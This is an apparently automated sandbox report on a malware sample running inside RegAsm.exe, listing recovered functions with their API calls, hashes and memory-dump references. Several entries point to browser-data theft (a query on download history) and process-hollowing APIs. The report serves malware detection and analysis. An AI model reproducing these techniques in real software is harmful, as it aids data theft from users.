                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C710080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C6E7204), ref: 6C710088
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C7100A7
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C6E7204), ref: 6C7100BE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                    • String ID: CryptCATAdminAcquireContext2$wintrust.dll
                                                                                                                                                                                                                                                    • API String ID: 145871493-3385133079
                                                                                                                                                                                                                                                    • Opcode ID: cc5959e0de1f46e702ba10e69f79994012be160dc0fde581d24b358b3501e536
                                                                                                                                                                                                                                                    • Instruction ID: 276092c2341bcafd0ca03190a9570c37049dd8c1f049ffc8f3565267331bc4d7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc5959e0de1f46e702ba10e69f79994012be160dc0fde581d24b358b3501e536
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACE012783053449FEF00AF268A087113AFCA70B345FD8443AAA10C2A00DFB5E1609B11
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C710170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C6E7308), ref: 6C710178
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6C710197
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C6E7308), ref: 6C7101AE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                    • String ID: CryptCATCatalogInfoFromContext$wintrust.dll
                                                                                                                                                                                                                                                    • API String ID: 145871493-3354427110
                                                                                                                                                                                                                                                    • Opcode ID: 266885681b15bc091265f37a6db355aae39461492233fd3661d18742cfee62a0
                                                                                                                                                                                                                                                    • Instruction ID: 1e585950a8545bdca605e498679222fdc8b0a278a31235124a171cd032fd758c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 266885681b15bc091265f37a6db355aae39461492233fd3661d18742cfee62a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0E04F70785344DBEF005F26CA08B163BFCB707695F980436EA8185B40DF74A460DB10
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C710120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C6E7297), ref: 6C710128
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6C710147
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C6E7297), ref: 6C71015E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                    • String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
                                                                                                                                                                                                                                                    • API String ID: 145871493-1536241729
                                                                                                                                                                                                                                                    • Opcode ID: b1e2ca54ecfd1614bf3b8bd3e0daa068ce635376f8740ad4f02dbee5872a4ade
                                                                                                                                                                                                                                                    • Instruction ID: 88f0d076eeb21491affd4e1ed81f64c2e36d593e7ab9b2b46831b4ed4eab0d8e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1e2ca54ecfd1614bf3b8bd3e0daa068ce635376f8740ad4f02dbee5872a4ade
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEE01A703093849BEF006F2AD9087163AFCA707364F984439AA05D2B00DF74E4209B10
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C73C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6C73C0E9), ref: 6C73C418
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C73C437
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C73C0E9), ref: 6C73C44C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                    • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                                                                                                                                                    • API String ID: 145871493-2623246514
                                                                                                                                                                                                                                                    • Opcode ID: 45406765ae41c941945e2b10ab391ac427cc081455dc385d470222b41b05fbb4
                                                                                                                                                                                                                                                    • Instruction ID: 46c9d77caf4e3f63a5c0053baee9ac1c0ab8cf29f205f1f27af0665c0add189c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45406765ae41c941945e2b10ab391ac427cc081455dc385d470222b41b05fbb4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00E092B0702315ABDF006F729A08B257EFCA70A605F889236AA0992701EFB2E4548A50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C7375B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6C73748B,?), ref: 6C7375B8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C7375D7
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C73748B,?), ref: 6C7375EC
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                    • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                                                                                                                                                                    • API String ID: 145871493-3641475894
                                                                                                                                                                                                                                                    • Opcode ID: b0556dba16a0f48c49da825267b7a147274dd615e7ab9994a530a37df0ec37f4
                                                                                                                                                                                                                                                    • Instruction ID: 64450b41619ed19f04cc533e54e50352cda04ba38968954381f3f581c340f9c3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b0556dba16a0f48c49da825267b7a147274dd615e7ab9994a530a37df0ec37f4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37E0B671701309EFEF006FB2DA487167AFCEB06258FE45835A905D1681EFB0A551CF10
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C737600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6C737592), ref: 6C737608
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C737627
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C737592), ref: 6C73763C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                    • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                    • API String ID: 145871493-1050664331
                                                                                                                                                                                                                                                    • Opcode ID: f0d812fa372582e4efd19b699182027083166610a6b44146905b8658ace96a16
                                                                                                                                                                                                                                                    • Instruction ID: d554fda660fb3f4e0243b43528547a584dcef4fca52e6fb159fa77aecdf81326
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0d812fa372582e4efd19b699182027083166610a6b44146905b8658ace96a16
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88E092B0700355AFDF006FB69E087117EBCE71A259FD45939E909D2641EFB1A4148B14
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C73C1F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6C73C1DE,?,00000000,?,00000000,?,6C6E779F), ref: 6C73C1F8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6C73C217
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C73C1DE,?,00000000,?,00000000,?,6C6E779F), ref: 6C73C22C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                    • String ID: WinVerifyTrust$wintrust.dll
                                                                                                                                                                                                                                                    • API String ID: 145871493-2991032369
                                                                                                                                                                                                                                                    • Opcode ID: 846ff81daa3147d8c43808514930a7d9af32193ebd46702e0c551ca283f58e95
                                                                                                                                                                                                                                                    • Instruction ID: 133ea777335734ead3fd36186cabc40215066fb696ce4beffee03e2c23163277
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 846ff81daa3147d8c43808514930a7d9af32193ebd46702e0c551ca283f58e95
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DE0B6743013559BDF407F62CA087127EFCBB07205FD4463AAA05D2702EFB1A4108B54
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00408210 Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 299stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00408508
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040851C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                                                                                    • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                                                                                                                                                                                    • API String ID: 2500673778-2241552939
                                                                                                                                                                                                                                                    • Opcode ID: 36ed976eb8b7b7364f5a3267f9e8dc698624d3e311bd475227079a4cb8571c5a
                                                                                                                                                                                                                                                    • Instruction ID: 262726998fc7bfb6f1ca874174d74250554945675107b90bc2b65f9b5e3821e0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36ed976eb8b7b7364f5a3267f9e8dc698624d3e311bd475227079a4cb8571c5a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FC15D71805248EACB14EBE4C955ADEBBB96F18304F54417EE406736D2DB382B0CCB79
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040F090 Relevance: 7.7, APIs: 5, Instructions: 165stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F0A5
                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 0040F0D2
                                                                                                                                                                                                                                                      • Part of subcall function 0040EEC0: strlen.MSVCRT ref: 0040EECD
                                                                                                                                                                                                                                                      • Part of subcall function 0040EEC0: strlen.MSVCRT ref: 0040EEE7
                                                                                                                                                                                                                                                      • Part of subcall function 0040EEC0: strlen.MSVCRT ref: 0040EFA2
                                                                                                                                                                                                                                                    • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,00000000,00000000,00000000,?,0040FAA1,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF,00000FFF), ref: 0040F11E
                                                                                                                                                                                                                                                    • VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040F204
                                                                                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 0040F213
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: strlen$QueryVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3099930812-0
                                                                                                                                                                                                                                                    • Opcode ID: 45a543692f22826bd2adcc7303a1d64609a4a03d2f53c354a93f1fd3d7f3f6d6
                                                                                                                                                                                                                                                    • Instruction ID: 5758d3a4a8cf4e69854eaadf42ecf8e764915f4f7ffd6d03d1fff534241d95db
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45a543692f22826bd2adcc7303a1d64609a4a03d2f53c354a93f1fd3d7f3f6d6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4851C375A00018ABEB24DEA9DC41ABFB7FAEB88704F14453AF805F7380D638DD1187A5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C73BE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,?,?,6C73BE49), ref: 6C73BEC4
                                                                                                                                                                                                                                                    • RtlCaptureStackBackTrace.NTDLL ref: 6C73BEDE
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C73BE49), ref: 6C73BF38
                                                                                                                                                                                                                                                    • RtlReAllocateHeap.NTDLL ref: 6C73BF83
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(6C73BE49,00000000), ref: 6C73BFA6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2764315370-0
                                                                                                                                                                                                                                                    • Opcode ID: 42a5afb9eeacf4681002baf0ada83d9280365f442245d2e7c7d275544df88fb7
                                                                                                                                                                                                                                                    • Instruction ID: 72b7bcd3c5fd67c8b428f8d620f98530face8b3f7db7872ff071598a130dc26b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42a5afb9eeacf4681002baf0ada83d9280365f442245d2e7c7d275544df88fb7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D651A671B006268FE710CF68CE80BAAB3A6FF84314F299639D51997B55D730F9068B80
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C728E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C71B58D,?,?,?,?,?,?,?,6C74D734,?,?,?,6C74D734), ref: 6C728E6E
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C71B58D,?,?,?,?,?,?,?,6C74D734,?,?,?,6C74D734), ref: 6C728EBF
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,6C71B58D,?,?,?,?,?,?,?,6C74D734,?,?,?), ref: 6C728F24
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C71B58D,?,?,?,?,?,?,?,6C74D734,?,?,?,6C74D734), ref: 6C728F46
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,6C71B58D,?,?,?,?,?,?,?,6C74D734,?,?,?), ref: 6C728F7A
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C71B58D,?,?,?,?,?,?,?,6C74D734,?,?,?), ref: 6C728F8F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: freemalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3061335427-0
                                                                                                                                                                                                                                                    • Opcode ID: 9be6153583fd2023d448d7042331021ceca47b381862e83f2db9ec905658336a
